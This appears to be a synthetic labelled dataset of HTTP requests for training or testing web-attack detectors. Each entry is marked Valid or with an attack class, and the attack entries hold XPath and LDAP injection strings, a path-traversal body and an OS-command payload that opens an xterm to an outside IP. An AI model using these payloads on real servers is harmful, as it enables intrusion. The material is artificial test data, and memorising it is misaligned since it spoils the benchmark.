If-Modified-Since: Mon, 27 Mar 06 10:21:59 GMT
If-Unmodified-Since: Mon, 31 Aug 09 10:24:36 UTC
If-Match: "mGZu@dswMCodRSPWdW1"
If-None-Match: *
If-Range: Sat, 09 Sep 06 24:32:13 CET
Max-Forwards: 66
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://Hsay.st/trannnt/atcu/nxsempc/fmeipts7/enyoea.bin
Authorization: Basic b2xleGk6bERhc2E=
Range: 7-93,534-66746
Referer: /hneT/cadA/nAiiiseg.php3
TE: gzip,deflate
Trailer: If-Unmodified-Since
User-Agent: tK-v8fIc http://www.gwhuc.ch
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x668
Via: 9.7 56.28.222.96, 0.4 234.175.95.191
Transfer-Encoding: compress
Upgrade: t5rg/1.6
Warning: 910 www.legsia.css:7 "totaiqAI" "Tue, 27 Dec 05 09:24:47 CET"
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 9412157070981544486
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28515
Start - Id: 13704
class: Valid
GET /cwl-.jNhj-R/pA7bW_.html?aodcatt3eeeCdbg=eYr&1HQoTNefh38e=Xhtacces0athz%5D%3Ajah+&etoNrc=70505090&en=ets&en8ietmcnlh=U2&ldsdiehAfel=85122325 HTTP/1.1
Host: 46.241.171.218:75779
Connection: bndepe
Accept: */*
Accept-Charset: windows-1250;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 8.253.133.52
Cookie: iistnoEIItaul=hNo;id1owieIt8r=oiTI9Q
Cookie2: $Version="0"
Date: Mon, 25 Jan 10 23:02:18 CET
ETag: W/"We_Dnx@r6z6uw4hOkIpS"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Tue, 15 Feb 05 18:07:43 CET
If-Unmodified-Since: Thu, 06 Sep 07 21:41:04 GMT
If-Match: "SFI6nCGASwXQbBgP"
If-None-Match: *
If-Range: Tue, 11 Mar 08 20:48:03 UTC
Max-Forwards: 957
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: sinane Id8nwt=6eipE
Range: -2
Referer: /iomntKa/npta/z0im/eehueas/deqtnmns.mdb
TE: trailers,trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/2.4 (Windows; U; WinNT 1.5; au-f2; rv:0.0.0) Gecko/04571247
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 757x935
Via: 1.3 69.142.201.137
Transfer-Encoding: identity
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 963 www.nr6uio.htm "hGclte" 
X-Forwarded-For: 19.232.169.41
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13704
Start - Id: 49678
class: XPathInjection
GET /wsaisoaehupyfis/dkK6bb./nuU_1/itlLQntaaNtsa/esRimefrr5snv9tse/dUhzxm4KkDBrNj-0Iln.pl?th8hwttRbam=10+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++++8614%3D&neeteuIyofy=d4H6dNh. HTTP/1.1
Host: 94.31.164.196:80
Connection: lzois
Accept: text/*;q=0.1
Accept-Charset: gb2312;q=0.9
Accept-Encoding: 
Accept-Language: 49nhwns0-Denmtiei, e2wans-st7th;q=0.4, i-Oatoefle;q=0.0, e-eehansiy
Cache-Control: min-fresh=322
Client-ip: 102.196.28.62
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="861"
Date: Fri, 17 Oct 08 01:06:35 GMT
ETag: W/"8vg1Wz8V9qRfAnK"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Thu, 17 Jan 08 06:37:38 CET
If-Unmodified-Since: Tue, 30 Dec 08 04:56:48 GMT
If-Match: "M6.AjhD6heqM7jh4fDg"
If-None-Match: *
If-Range: *
Max-Forwards: 805
MIME-Version: 5.9
Pragma: 5l0mcv='1Qzs8ic'
Proxy-Authorization: fefd 0ae8ehin=q6gL
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: /hrulnl/dhf8.cgi
TE: chunked,chunked
Trailer: Range
User-Agent: yuplef (tTYjt7; 4.9VyLRQX; e7SLAr.bL6; wqpu@_8B2)
UA-CPU: Sparc
UA-Disp: 8272,159,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: HTTP/5.0 118.178.44.198, yea/3.5 218.106.146.168:03
Transfer-Encoding: identity
Upgrade: uva/6.8
Warning: 381 115.122.86.133 "cnay5hst5e7r" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49678
Start - Id: 4108
class: Valid
PUT /6fgnibctns/idrotdpkhrr/wV.mspx? HTTP/1.0
Content-Length: 238
Content-Language: e6TsT
Content-Encoding: gzip
Content-Location: http://www.rWlqor.de/Xrso5ri/Oadoeni.php4
Content-MD5: c3B0dGpSMWo5cmV0cmFycg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Feb 05 20:53:52 CET
Last-Modified: Sat, 15 Apr 06 04:57:47 UTC
Host: 206.104.81.115:3407
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987
Accept-Encoding: 
Accept-Language: leemtsm-czplaee
Cache-Control: no-cache
Client-ip: 90.59.196.121
Cookie: okaqqhesemtn03=45696584
Cookie2: $Version="0"
Date: Sun, 11 Apr 04 04:14:33 CET
ETag: "us4d89NA6NiZePn"
Expect: taiispy
From: tEpEp@tir3gian.cz
If-Modified-Since: Wed, 30 Nov 05 10:32:47 UTC
If-Unmodified-Since: Wed, 01 Oct 08 01:03:22 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 31 Mar 04 10:28:08 CET
Max-Forwards: 5134
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: aisesf nMetM=q8cte1s
Authorization: tuftR0 6y1hr=xvOuz4o
Range: 0-34844,-703
Referer: http://www.is6e.st/scieedg/shmrsyah/pnhoea/G5pozu.mspx
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/8.2 (Windows; U; WinNT 6.3; pn-7i; rv:7.1.0) Gecko/37514378
UA-CPU: Sparc
UA-Disp: 4996,3715,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 334x3982
Via: 4.1 www.it4he.gif, vni/8.3 69.148.234.173
Transfer-Encoding: dstuw; fotDbghd=tNuq19x
Upgrade: txgQ/6.8, rwt/5.6, p7law4/7.6, Pi4lm/5.6
Warning: 106 183.66.247.185 "hitOt" 
X-Forwarded-For: 88.216.9.126
X-Serial-Number: 8957401
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

is=sb&4styledcg3B7scInull=7334819&6oui17LaelnY=28607&haAwlRd3lsa='Aaev&Onuo=3437029628&SxmENTLc.Pv6=l4oiYnoefbr2assa&petuiesk=sy%h&t $a%[bodynmsod5&@nzDs=latumos2sinauuts&ihe=reZ4b62GDv_&uNfxrz=Sii&tdgae4brcmscH=tAl1gbeEseunuh

End - Id: 4108
Start - Id: 3806
class: Valid
GET /s-8@@/eoiittfsaim1B2/s1NFK@dCzwZsFMiF/y2Treiopniz/_q.oRLQeW7MIE/y9mS/d@1QMSvaBQ4FlNWE/sincludeGIxySIaservicesMN/uzofbE/cim/te1wsiJsiTlCE.tiff?dToheeOhmeeM=809&22cdaedh=brmo&essdpmwn=b29efgtD&btbcmdVphvh=442&l8LygSuGFp9=e8%3EhSpd0zaalLwiframemlocationoz&gdled=97 HTTP/1.0
Host: www.lv9r6teti.cz
Connection: close
Accept: application/rtf;q=0.4, video/*, audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, gzip, gzip, deflate
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 113.122.110.70
Cookie: LCnhtacces=var8c85ofse'3m3R;isTe1rarot=lwdtslFn
Cookie2: $Version="78"
Date: Sat, 20 Jun 09 03:16:46 UTC
ETag: "60FVj.YRAZVmjALPW6R"
Expect: 100-continue
From: r0oAr@svheb.cz
If-Modified-Since: Sun, 11 Jun 06 22:49:51 GMT
If-Unmodified-Since: Thu, 21 Oct 04 14:56:39 GMT
If-Match: "qNMwzPGNdR5Z9I@h-GfA"
If-None-Match: "n@j44Wf9lldQObVefUxL"
If-Range: *
Max-Forwards: 100
MIME-Version: 9.6
Pragma: uei2a='bss'
Proxy-Authorization: Basic b3R1MGFvbzp0dGg5bXlo
Authorization: Basic aUVldWg5QWE6YVAyZ3RsQ2U=
Range: 645-
Referer: http://www.yb3slAo.ch/oueea0/czirhd.avi
TE: trailers
Trailer: If-Match
User-Agent: bth3mwaL (ao4y1nMpr)
UA-CPU: PowerPC
UA-Disp: 716,803,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5422x365
Via: gngtl/4.0 www.eeemgd.jpg, 5.7 158.218.173.194
Transfer-Encoding: compress
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 518 www.eueeyr.jpeg "tgssmnnype2ohbn" "Mon, 16 Mar 09 02:19:12 UTC"
X-Forwarded-For: 163.248.155.118
X-Serial-Number: 99271144
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3806
Start - Id: 27124
class: Valid
GET /vpgn7u/O39wtwirithc.sh? HTTP/1.0
Host: www.W1se.it
Connection: keep-alive
Accept: */*
Accept-Charset: euc-cn, x-mac-greek, ks_c_5601-1987, x-mac-arabic
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 33.122.90.124
Cookie: t9unteWenbu=ihs@k;eecdntllTs=ng;HnIl=tuxeaeiakcrlei
Cookie2: $Version="926"
Date: Mon, 12 Sep 05 17:14:57 GMT
ETag: "cR@krZP4Fect@PPa6kM0"
Expect: 100-continue
From: autmrtph@gdspioa8s.it
If-Modified-Since: Fri, 10 Nov 06 06:00:37 GMT
If-Unmodified-Since: Tue, 29 Jan 08 02:55:32 CET
If-Match: *
If-None-Match: *
If-Range: "7M@uoNz_-kVOmNC"
Max-Forwards: 788
MIME-Version: 4.2
Pragma: diudberh='moeee'
Proxy-Authorization: cDsd5 tanae3ex=Nmchr
Authorization: diom hfoioe=rrah
Range: 17545-664
Referer: /lfeoeia/gtfd/agaaSme/eEDaee/Nh6Anta4.html
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.3 (Windows; U; Win98 6.6; wc-sO; rv:2.1.0) Gecko/17250788
UA-CPU: Sparc
UA-Disp: 940,210,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 419x0757
Via: blHsn4/2.2 www.ipd9e.shtml, HTTP/3.5 192.18.7.40, 6.1 183.204.41.151
Transfer-Encoding: gzip
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 804 www.hpqoryti.css "Thqahnetlrepeoynn" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: -----------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27124
Start - Id: 37161
class: LdapInjection
GET /dVL/hiptfthiEs2hy9h/oNf8/s98ddcipryynwD/eUwXgVyJ/oM1LXNuhut/qvEnYdS@p42/rujeUVqFs_Q.2q96an7/9AKgroup byhttpvZ2ZejtP/y0Pm/wie5ftk0c.jpg?e3hhDea2E=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&hifobniisA8sbls=507329&sremro=tiiv%5Cttknelhtp8 HTTP/1.1
Host: www.49ui8mols.gov:80
Connection: xnlb
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 9-vH;q=0.6
Cache-Control: no-cache
Client-ip: 188.238.110.194
Cookie: odc=s;vc=h9_JiB7B;fcoDe=okthbesatdpijboea;ek13rlTotusinoT=8128768
Cookie2: $Version="45"
Date: Thu, 03 Nov 05 08:05:33 UTC
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: 100-continue
From: leAt4Eeo@dfiwc.org
If-Modified-Since: Mon, 10 Mar 08 15:19:04 CET
If-Unmodified-Since: Wed, 28 Jul 04 08:14:49 GMT
If-Match: *
If-None-Match: "D3YV@nqrLZimSBOdBtPb"
If-Range: *
Max-Forwards: 40
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: Basic YXBvczpza05p
Range: 183458-,10781-99705
Referer: http://www.duhlsp.uk/e7aie.asmx
TE: trailers
Trailer: Connection
User-Agent: Mozilla/6.3 (Windows; U; Win98 8.7; pj-tb; rv:5.4.8) Gecko/34205595
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5776x2501
Via: 2.2 227.81.158.63, FTP/7.8 207.41.48.39:603, HTTP/5.6 174.36.26.210
Transfer-Encoding: gzip
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 57194
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37161
Start - Id: 34613
class: Valid
POST /uhNea3reetsT/tutsid/rSvi9lHjE5ms0i0/positionlssYTugBY8@u/rUeNBMRgkE1tX-VZk/eAII6xVYan_F.jpg? HTTP/1.1
Content-Length: 216
Content-Language: Seiawar,ar,riofU7R
Content-Encoding: compress
Content-Location: http://www.sdesKm.cz/wsi2mq/Pi02/jedmNa6n.sh
Content-MD5: b3V4R2RocmU3aG5waWV2Zg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Jan 07 22:58:31 CET
Last-Modified: Fri, 28 Jan 05 22:17:50 GMT
Host: www.iXti.net:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=7
Client-ip: 242.105.146.186
Cookie: sibre6lcfbvu=vu2;2t1GQ2Qb=9137;rsncdOS=xaOEi;sa6sTpehrhio0=r7jR;orTumas=hGr1GVuJX.J9;QeobsdrBewsosj=ic C8
Cookie2: $Version="89"
Date: Wed, 04 Apr 07 08:57:50 CET
ETag: "_eDbmrmvV6SNeyKh1S"
Expect: 100-continue
From: 9acwoadm@8yele.org
If-Modified-Since: Sat, 11 Jun 05 07:09:26 GMT
If-Unmodified-Since: Sat, 14 May 05 04:44:36 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Oct 04 14:10:31 UTC
Max-Forwards: 758
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://3just.gov/rahno/3iaN/ihov/nylA/agere.mp3
Authorization: Digest algorithm=MD5-sess
Range: -64
Referer: /ibntaA.fgf
TE: gzip;q=0.2,trailers,chunked
Trailer: Range
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 6.8; iu-pe; rv:7.5.5) Gecko/97567355
UA-CPU: PowerPC
UA-Disp: 017,016,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6005x647
Via: 4.9 www.srszeAx0.jpeg:74786
Transfer-Encoding: identity
Upgrade: i0taeg/8.4, k4xlia/5.0
Warning: 889 www.0ne7i.css "tiEaal7iotnjge" "Wed, 24 Jun 09 03:48:23 GMT"
X-Forwarded-For: 234.124.3.68
X-Serial-Number: 1977553705
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ytlnea=mroe&alrldfnrchf=64709425&le3H2t=00947090&xazirtaljfeie=ufoirmuanlog $unionm+n=:e&ezodhoerajy=82756267&GPifromdrF=tEeTPttAnd8&dmlegndhliebdRn=3319177&BZJneGx=96339&loa=mpeeecho&yhQa=AcmineeTysbmvs&5t=d

End - Id: 34613
Start - Id: 36260
class: PathTransversal
POST /zDbodyAjWGC_/1arrn43oyeksnS/0pi/edehibSmtuawchDepiae/jGMmPQKi4j21yuj_a.jpeg? HTTP/1.0
Content-Length: 215
Content-Language: oeln6qus
Content-Encoding: deflate
Content-Location: http://7esoaca.be/anea/HsO9/gsohit/mydeedt.tiff
Content-MD5: aGRuSWFTb2VraHB0Nm5pdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 13:45:12 UTC
Last-Modified: Sat, 22 Mar 08 19:04:52 GMT
Host: 176.216.94.73:290
Connection: a6ccacg
Accept: text/plain, video/quicktime, image/*;q=0.1
Accept-Charset: x-mac-greek, x-mac-korean, iso-2022-jp, koi8-r
Accept-Encoding: 
Accept-Language: iOluasn-iyhah
Cache-Control: no-store
Client-ip: 112.174.108.236
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="6"
Date: Fri, 11 Feb 05 06:43:23 GMT
ETag: W/"ajx.F7yjkUqvV9i"
Expect: eigacm=eafotax;3ngniEI=1owL6ot
From: tarcw@rtJihd7rad.st
If-Modified-Since: Thu, 06 Dec 07 08:27:36 UTC
If-Unmodified-Since: Tue, 21 Mar 06 13:19:29 CET
If-Match: "kRIZOq9LqOFAQ_5YHF_"
If-None-Match: "FNgOUp_BeNPShhitxQ"
If-Range: Thu, 08 May 08 19:56:09 UTC
Max-Forwards: 3
MIME-Version: 4.1
Pragma: at='lribde'
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: http://easusd.net/annlor/hnreOns/dcou0e/7atlser/mwbe.txt
TE: gzip;q=0.6,trailers,deflate
Trailer: Via
User-Agent: Mozilla/7.8 (Windows; U; Win98 2.1; rt-gp; rv:8.8.8) Gecko/83630239
UA-OS: Mac OS X
UA-Pixels: 274x803
Via: 6.4 233.244.8.64:6, 8.5 220.76.61.28, 7.0 0.132.69.0:14681
Transfer-Encoding: anZlNw; eqrY=ensbaol
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 373561345188
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ygyfIxaeyEd=37716477&nRO=5zol<d\u&neopni=f5I5b0&Nai=ikpcasoonumOe$?&ziedsnwosbR=nIaapSt.&adPdAbZ=uynlaxcn+)r&ywTgpertoDy7f=nenetcat&adminKrRo3rEPhx_=voet6lteMro&Sq7r@T=sdV&qCainqlrleo=4:/.htaccess~

End - Id: 36260
Start - Id: 25479
class: Valid
GET /sagsfdtea/.pIXA5GlELFQ9AD/rrmR/egYeaGY4TzsL1/8AN1xen524G.sh? HTTP/1.1
Host: 5.73.81.190:8381
Connection: close
Accept: text/*;q=0.9, application/postscript;q=0.9, application/zip
Accept-Charset: big5;q=0.7
Accept-Encoding: *
Accept-Language: 1lN-aenIcls;q=0.9, f-ab;q=0.4, ul1a-llE7thi, aroid3t-eorrceD4;q=0.2, a80aa-adewjhN;q=0.9
Cache-Control: no-store
Client-ip: 235.222.69.4
Cookie: qbfvhruncyjqyen=tcsweenaiMt;LfTN=c:thdibodypeftptsjbpomail19
Cookie2: $Version="95"
Date: Tue, 23 Jan 07 23:53:55 CET
ETag: W/"NeeL9UfNwl6yKjG"
Expect: 100-continue
From: 70e1iIDx@2edTt9Wse.org
If-Modified-Since: Mon, 02 Feb 04 22:18:50 CET
If-Unmodified-Since: Tue, 07 Sep 04 13:04:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 07 Apr 07 14:15:11 CET
Max-Forwards: 68
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZWNjdHNqOm90alM0
Authorization: Digest username="aEeuapyd"
Range: -855,-18,-1
Referer: http://www.rir6ntzg.cz/idisw/Frrcwovn.fgf
TE: chunked;q=0.6
Trailer: Accept
User-Agent: yeegfezyi (eMxRo@1)
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: HTTP/3.2 www.ir4jro9.htm, 8.0 www.VtOak.html:54
Transfer-Encoding: identity
Upgrade: beumb/2.2, f5l/6.8
Warning: 898 81.55.160.68 "e9az1gc0lmr7ohaclob" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 724293
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25479
Start - Id: 43218
class: OsCommanding
GET /rnh/enqkcencnxiOtoK7yuty/BY/ay9t9Ehoe.mdb?WliHlzrhstevvoT=Hr2W%2F&is=execao+yn&nbmeta5B0H=e%3E%24iaecbCiceta+ro%3F%2F&G-UJFJ-HpassthruY=ySoDseh8ht+flocationlinkw&at4ssEwl=ja4Aahs&gytFL0SeI4=%5Cr+++xterm++++-display+++196.162.223.79%3A0.0&oufveWiutexs=cin&iTecnraoHreq3t=%5Dbht HTTP/1.1
Host: 23.128.105.42
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: tnlni-eve, gss9bee-htelr, 8-tnHitD;q=0.9, tE-tittn;q=0.6, h-erc1ll;q=0.0
Cache-Control: max-stale
Client-ip: 141.13.227.191
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="492"
Date: Sat, 14 Jul 07 21:58:01 GMT
ETag: W/"Dx8LFZguVMuaJIBl"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Sun, 28 Mar 10 04:45:20 CET
If-Unmodified-Since: Wed, 27 Jan 10 09:11:49 CET
If-Match: "ZfzlTNiogMaFknCW1"
If-None-Match: *
If-Range: Fri, 31 Jul 09 14:00:06 CET
Max-Forwards: 702
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: mfey smnSW=fltvk
Authorization: ton5w eo0iw=9u8fi
Range: 2403-,12114-9,53-40810
Referer: /Sjwap.js
TE: deflate;q=0.3,gzip,trailers
Trailer: TE
User-Agent: Mozilla/2.2 (Windows; U; Windows NT 0.6; le-8l; rv:4.9.0) Gecko/54522520
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 476x125
Via: twm/1.6 www.auntsqe1.shtml
Transfer-Encoding: compress
Upgrade: pIh6l/8.2, tEst/3.2
Warning: 931 29.33.161.132:937 "tiriHq" "Sun, 23 Apr 06 11:58:11 UTC"
X-Forwarded-For: 33.3.87.207
X-Serial-Number: 3512760212193
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43218
Start - Id: 16594
class: Valid
GET /d88FQV0/h5oxtx4us73N77WYeGJ/o.4.sl2VU_X_QyYVU33/xP@8YiWBpC4vp5.opYzS.php? HTTP/1.1
Host: 238.209.206.90:171
Connection: ht6eh
Accept: application/x-tar, audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.2, identity;q=0.8, deflate;q=0.2, deflate
Accept-Language: *
Cache-Control: min-fresh=8
Client-ip: 188.3.214.251
Cookie: iZgO_=gweihhttsrlR7iy;nlljhxer=i?Tr9rtocEts[%l
Cookie2: $Version="0"
Date: Mon, 17 Mar 08 05:19:45 UTC
ETag: "D3ExAVU3H4Oeq5j14AwJ"
Expect: 100-continue
From: bloE0mq@0Tsa2yccis.de
If-Modified-Since: Thu, 22 May 08 04:11:46 UTC
If-Unmodified-Since: Wed, 27 Sep 06 05:37:06 GMT
If-Match: "Q5exn4u11wyORf@cA6"
If-None-Match: *
If-Range: Fri, 18 Aug 06 18:24:41 UTC
Max-Forwards: 6
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dHRhRWVvdDoydGViRWUydQ==
Authorization: NTLM b2U5Tm9uc3V6ZWExZWgzaW9udGR0aHNvdDhuZU1ub281dGl0ZWFsYndsZmR0ZA==
Range: -508053,86460-25,-68
Referer: http://Eslx.cz/fotiiof/us4M/iraurs/eyIlm9f/uiOgkhv.msf
TE: trailers,chunked
Trailer: Connection
User-Agent: tuPneJ (h1qwhgqQ; myGvd.r; 91TEAi; sjB3pFSG)
UA-CPU: x86
UA-Disp: 1704,0727,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7789x534
Via: HTTP/3.0 210.151.132.77:7046
Transfer-Encoding: deflate
Upgrade: 0tao/4.5, qanz/0.6
Warning: 302 www.iatetm.shtml "Tetamelsqnttnkl0otnA" 
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16594
Start - Id: 49698
class: XPathInjection
GET /uh365Yq6l/telnetEW/paed/nzLfaerwhosadt1/cmcq/a7a6o8g7/I4hoiiEooE.mspx?8apltyc=qmz%27+++++or++++6++++%3C+count%28path%2Fchild%3A%3A*%29+or++++%27fds%27+++%3D++++%27&ne77asszzpz=7ToDB6Cdd&sTl6auezwtreot=71804175&tehzoslw=act&adt=9815258728&ceje=+RL&mrfeecl=An%28Xms%24u&uu8V-KJTmOmw=tmwgceiL3la&rerco=6758&ixeforShfadmisr=763599839&pn=IunHHr03tqsFc&3eiaowoint45i=ht9+%5Ce+mb&rosit3=35945&Sgogoitire5a=8619&orv@vROUmI=srd1i%3F%7Eaceijsat7uB0 HTTP/1.1
Host: 69.230.143.72
Connection: close
Accept: video/mpeg
Accept-Charset: iso-8859-7;q=0.6, x-mac-ce;q=0.2, iso-8859-9, ks_c_5601-1987;q=0.6, x-mac-arabic;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 251.247.9.85
Cookie: kMgmnceg=cc;dteopt9td=)ehxafscmeua:mt;m4stizerrtbsos=6979;drgTt9amo=et;U.9Qfromxp__=arlxcaosywse;EMcKzo4r6=si8
Cookie2: $Version="03"
Date: Mon, 06 Nov 06 19:43:09 CET
ETag: W/"s3klw_r.kke6tQh"
Expect: iazqtree
From: tmHtei@9Eaetn4.de
If-Modified-Since: Tue, 27 Apr 04 21:14:11 CET
If-Unmodified-Since: Sat, 02 Dec 06 17:19:34 CET
If-Match: "RJk3cewTzUszylGDQKvP"
If-None-Match: *
If-Range: *
Max-Forwards: 01
MIME-Version: 8.1
Pragma: k1ehsu1=d
Proxy-Authorization: uusu eemhe=Ssod
Authorization: aizl celi3ol=Reesi
Range: -394122
Referer: /zsfrUCh/cviard7q/etee3nv.msf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: dhe4iiXtqCnhtitz
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6094x1402
Via: HTTP/7.0 www.oe5nl.jpg, 9.6 www.Parxds.js, 5.6 207.194.62.105:89
Transfer-Encoding: compress
Upgrade: ierniu/6.4, ytteh/9.3, ahoito/8.8
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 961902739764518
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49698
Start - Id: 24263
class: Valid
GET /8utYj/lpCruj1GoHpZ2SA/ss1Ov4BgA681QCYtr/c5aOn3/nULjrEv-J7OUX/8-PY-UH4jjg/tBbo/niframe8CDwa3eAreplace@EG.swf? HTTP/1.0
Host: www.o7ie8inb.it
Connection: keep-alive
Accept: video/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 88.80.89.186
Cookie: e8hnsnadkh=3atdF;amedIr8Ust=zu
Cookie2: $Version="205"
Date: Wed, 01 Oct 08 07:22:03 UTC
ETag: W/"jdOxHWXkodp1NHROiQR"
Expect: oeht=l9TsdoR;totD
From: 0acmo@nnrTii0.com
If-Modified-Since: Fri, 12 Jun 09 10:46:15 GMT
If-Unmodified-Since: Fri, 02 Feb 07 09:03:01 GMT
If-Match: "ZE.o69jFr1-DB1f-IZN"
If-None-Match: "0F7oUJ_gm7DS-c5Li"
If-Range: Wed, 15 Feb 06 09:12:58 GMT
Max-Forwards: 151
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: praul1 nnstat=aopbsid
Authorization: Basic Nm5rYzpwcndxdEU3bA==
Range: 6702-
Referer: http://www.spi7hneo.net/s4eri/dtes/nipraee/xcozdcoo/ii9z6ttp.dll
TE: chunked,trailers
Trailer: Trailer
User-Agent: slTtacsheaa3Smi7
UA-CPU: PowerPC
UA-Disp: 097,7605,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 982x566
Via: i2z/8.2 www.uire.tiff, 3.0 140.4.145.41:3628
Transfer-Encoding: identity
Upgrade: nmsBw/3.6
Warning: 562 www.dneRs.shtml "nnE7halnnAu8" "Sat, 18 Nov 06 18:27:26 GMT"
X-Forwarded-For: 197.180.62.9
